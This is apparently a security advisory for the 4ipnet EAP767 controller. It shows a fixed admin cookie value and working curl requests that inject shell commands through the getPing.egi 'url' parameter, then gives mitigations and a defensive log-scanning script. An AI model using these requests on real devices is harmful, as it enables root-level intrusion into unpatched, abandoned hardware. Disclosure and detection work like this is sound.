# 4ipnet/EAP767 WRT is vulnerable to Incorrect Access Control and OS Command Injection

Affected version: EAP767 - 3.42.00

## Vulnerability

- The device is vulnerable to Incorrect Access Control: with the same set of credentials, the content of the session cookie remains unchanged regardless of how many times a user logs in (CWE-284).
- An OS command injection vulnerability was found in the web interface of the device (CWE-78).

## Impact

- The fixed credential cookie gives an attacker who obtains it access to the victim's account. This could mean access to higher-level privileges or the ability to view sensitive data.
- An attacker with valid credentials may inject arbitrary shell commands, which the device executes with root privileges.

## Mitigation

- Stop using the product and switch to an alternative product.
- The developer disbanded in Oct 2020, and firmware updates will not be provided.
- Disable internet access to the device.
- Change the default credentials.
The login web page is exposed to the internet and is used for the 4ipnet wireless network controller.

Search online documents to obtain the default password for the device.

### Web console features

Network Utilities: allows network tests such as ping, tracert, arping, etc., to be performed through the web page.
### Phase 1 @ Browser

The front-end performs input validation to check whether the entered text is compliant.

Turning to the backend, we analysed the HTTP request characteristics from the network traffic and gathered two request patterns:

```
# request 1
http://{host}/getPing.egi?url=127.0.0.1
# request 2
http://{host}/getPing.egi?pid=940
```

It can be observed that the ping function first sends the target as the `url` query-string parameter and obtains a pid, then retrieves the ping output in batches through the `pid` parameter, and finally presents the results on the web page.
It was found that the management interface relies solely on the cookie name/value pairs as the basis for user identification. Using the same set of credentials (admin), the content of the cookie remains unchanged regardless of how many times you log in:

| Name | Value |
|---|---|
| username | admin |
| password | 17lgP6vqCV1Ko |
### Phase 2 @ cmd

Using curl to send an HTTP request to the management interface home page, the request was redirected to the login page.

Using curl with the cookie obtained above included, it was confirmed that the authenticated management interface home page is accessible.

We then attempted to access `getPing.egi` and escape the `url` query-string parameter using special characters (`;`, `|`) in an attempt to evade the check and inject a specified command.

Attempt 1 with `;`: detected as invalid characters by the backend program.

```
❯ curl -i -b "username=admin; password=17lgP6vqCV1Ko" "http://{host}/getPing.egi?url=127.0.0.1;"
HTTP/1.1 200 OK
Date: Mon, 15 Jan 2024 01:49:25 GMT
Server: Mbedthis-Appweb/2.4.2
Cache-Control: no-cache
Content-type: text/html
Content-length: 29
Connection: keep-alive
Keep-Alive: timeout=60, max=100
Illegal Characters of URL.
OK%
```
Attempt 2 with `|`: escape successful, and a pid was obtained.

```
❯ curl -i -b "username=admin; password=17lgP6vqCV1Ko" "http://{host}/getPing.egi?url=127.0.0.1|"
HTTP/1.1 200 OK
Date: Mon, 15 Jan 2024 01:52:49 GMT
Server: Mbedthis-Appweb/2.4.2
Cache-Control: no-cache
Content-type: text/html
Content-length: 4
Connection: keep-alive
Keep-Alive: timeout=60, max=100
3704%
```
Inject the target with `ls` to list the current directory:

```
curl -i -b "username=admin; password=17lgP6vqCV1Ko" "http://{host}/getPing.egi?url=|ls"
```

Inject the target with `ls -l` to display the current directory structure, file permissions, file types, modification dates, and other information:

```
curl -i -b "username=admin; password=17lgP6vqCV1Ko" "http://{host}/getPing.egi?url=|ls%20-l"
```

Inject the target with `cat /etc/product.info` to read the product information file:

```
curl -b "username=admin; password=17lgP6vqCV1Ko" "{host}/getPing.egi?url=|cat%20/etc/product.info"
```

This confirms the presence of a Remote Code Execution (RCE) vulnerability in the product: arbitrary commands can be executed by passing them through the `url` parameter.
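To make the failure mode above concrete from the defender's side, here is an added example (not 4ipnet's code; the `weak_check` reconstruction of the device's denylist and the access-log lines are assumptions) that contrasts the observed single-character denylist with a strict allowlist for ping targets and scans constructed access-log lines for `getPing.egi` requests whose `url` parameter fails it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Observed on the device: ';' is rejected ("Illegal Characters of URL.") but '|'
# is not. A denylist of individual shell metacharacters is always incomplete.
DENYLIST = ";"

def weak_check(target: str) -> bool:
    """Hypothetical reconstruction of the device's denylist check (not 4ipnet's code)."""
    return not any(c in target for c in DENYLIST)

# Hardened form: an allowlist that only admits an IPv4 literal or a DNS hostname,
# so no shell metacharacter can ever reach the command line.
_IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")
_HOST = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
                   r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)

def strict_check(target: str) -> bool:
    """Accept only a plain IPv4 address or hostname; everything else is rejected."""
    return bool(_IPV4.match(target) or _HOST.match(target))

# Defender side: scan web-server access-log lines for getPing.egi requests whose
# url parameter would not pass the allowlist. parse_qs already percent-decodes.
_REQ = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

def suspicious_ping_requests(lines):
    hits = []
    for line in lines:
        m = _REQ.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if not parts.path.endswith("/getPing.egi"):
            continue
        for target in parse_qs(parts.query, keep_blank_values=True).get("url", []):
            if not strict_check(target):
                hits.append(target)
    return hits

# Constructed sample log lines modelled on the requests shown in the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jan/2024:01:49:25 +0000] "GET /getPing.egi?url=127.0.0.1 HTTP/1.1" 200 29',
    '10.0.0.5 - - [15/Jan/2024:01:52:49 +0000] "GET /getPing.egi?url=127.0.0.1| HTTP/1.1" 200 4',
    '10.0.0.5 - - [15/Jan/2024:01:53:10 +0000] "GET /getPing.egi?url=|ls%20-l HTTP/1.1" 200 512',
    '10.0.0.5 - - [15/Jan/2024:01:53:30 +0000] "GET /getPing.egi?pid=3704 HTTP/1.1" 200 120',
]
if __name__ == "__main__":
    for hit in suspicious_ping_requests(SAMPLE_LOG):
        print("suspicious ping target:", repr(hit))
```

Only the two requests carrying a `|` in the `url` parameter are flagged; the legitimate ping and the `pid` polling request pass.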